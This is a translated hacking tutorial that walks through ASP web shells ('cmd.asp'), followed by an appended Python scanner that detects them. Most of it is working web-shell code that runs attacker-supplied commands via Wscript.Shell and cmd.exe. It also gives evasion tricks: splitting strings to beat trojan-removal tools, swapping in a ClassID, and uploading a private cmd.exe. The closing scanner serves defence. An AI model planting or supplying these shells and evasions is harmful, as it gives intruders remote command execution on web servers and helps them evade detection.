Tool: Http://pan.baidu.com/s/1o6jxAgq
First, look at Zzzeva's FSO-free cmd.asp:
<input type=text name= "cmd" size=60>
<input Type=submit value= "Run" ></form>
<textarea readonly cols=80 ROWS=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
" & Request.Form ("cmd")). STDOUT.READALL%>
</textarea>
Does it feel a little long? That much code is awkward to write out during an injection. Let's change it.
Second, a modified version of Zzzeva's FSO-free cmd.asp:
<textarea readonly cols=80 rows=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>
Usage is xx.asp?cmd=net user
This version makes the results convenient to read. In fact, if appearance does not matter, it can be shorter still, which gives the third.
Third, a shortened cmd.asp:
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>
Response.Write is used here, and the variable is named cmd. Why not make it shorter?
Fourth, a shorter cmd.asp:
<%=server.createobject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
This seems to be the shortest. Apart from being short, there are other places that need work.
Fifth, what if Wscript.Shell has been renamed?
Code:
<object Runat=server Id=kk Scope=page
Classid= "Clsid:72c24dd5-d70a-438b-8a42-98424b88afb8" ></ObjEct>
<%=kk.exec ("cmd/c" +request ("cmd")) .stdout.readall%>
Of course, the ClassID value differs between systems, so it has to be changed to match.
Sixth, what if it is detected by ASP-trojan removal software?
Split the strings apart. Code:
<%=server.createobject ("ws" + "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
Or
<%=server.createobject ("ws" & "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
The text inside the quotation marks can be split arbitrarily; for example, it can also be broken into:
<%=server.createobject ("ws" & "Cript.shell"). EXEC ("C" & "md.exe/c
"&request (" C ")) .stdout.readall%>
Seventh, what if cmd.exe is not allowed to be called?
You upload a cmd.exe yourself, put it in a directory that can be called, and the code changes as follows:
<%=server.createobject ("Wscript.Shell"). EXEC ("e:\aspx\cmd.exe/c
"&request (" C ")) .stdout.readall%>
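A defender-side check for the variants listed above, as an added example that is not part of the original page: it folds split string literals back together before matching, so the "ws" & "Cript.shell" form, the ClassID <object> form and the explicit cmd.exe path are all still flagged. The function names and indicator names are hypothetical, and the regexes are heuristics for triage of ASP files, not a VBScript parser.

```python
import re

# ClassID the page uses in its <object> tag in place of the Wscript.Shell ProgID
WSH_CLSID = "72c24dd5-d70a-438b-8a42-98424b88afb8"
_CONCAT = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')   # "ws" & "cript.shell"
_ASP_BLOCK = re.compile(r"<%(.*?)%>", re.S)

def fold_literals(code: str) -> str:
    """Join adjacent string literals ("a" & "b" -> "ab") until stable."""
    prev = None
    while prev != code:
        prev = code
        code = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', code)
    return code

def scan_asp(source: str) -> list[str]:
    """Return sorted indicator names found in the text of one ASP file."""
    hits = set()
    flat = re.sub(r"\s+", "", source.lower())
    if "runat=server" in flat and WSH_CLSID in flat:
        hits.add("wsh-clsid-object")
    for block in _ASP_BLOCK.findall(source):
        # Fold split literals first, then drop whitespace and case
        code = re.sub(r"\s+", "", fold_literals(block).lower())
        if 'createobject("wscript.shell")' in code:
            hits.add("wsh-progid")
        if re.search(r"\.(exec|run)\(.*request[.(]", code):
            hits.add("request-to-exec")      # request data reaches Exec/Run
        if re.search(r'\.(exec|run)\("[^"]*\\cmd\.exe', code):
            hits.add("cmd-explicit-path")    # cmd.exe called by full path
    return sorted(hits)

# Inputs: three listings as printed on this page, plus one constructed benign page.
SAMPLES = {
    "split": '<%=server.createobject ("ws" & "Cript.shell"). EXEC ("C" & "md.exe/c\n"&request (" C ")) .stdout.readall%>',
    "clsid": '<object Runat=server Id=kk Scope=page Classid= "Clsid:72c24dd5-d70a-438b-8a42-98424b88afb8" ></ObjEct>\n<%=kk.exec ("cmd/c" +request ("cmd")) .stdout.readall%>',
    "path": r'<%=server.createobject ("Wscript.Shell"). EXEC ("e:\aspx\cmd.exe/c "&request (" C ")) .stdout.readall%>',
    "benign": '<% Set d = Server.CreateObject("Scripting.Dictionary") %><%= Server.HTMLEncode(Request("name")) %>',
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, scan_asp(text))
```

The "request-to-exec" indicator does not depend on the object name at all, which is why it still fires on the ClassID variant where no ProgID string is present.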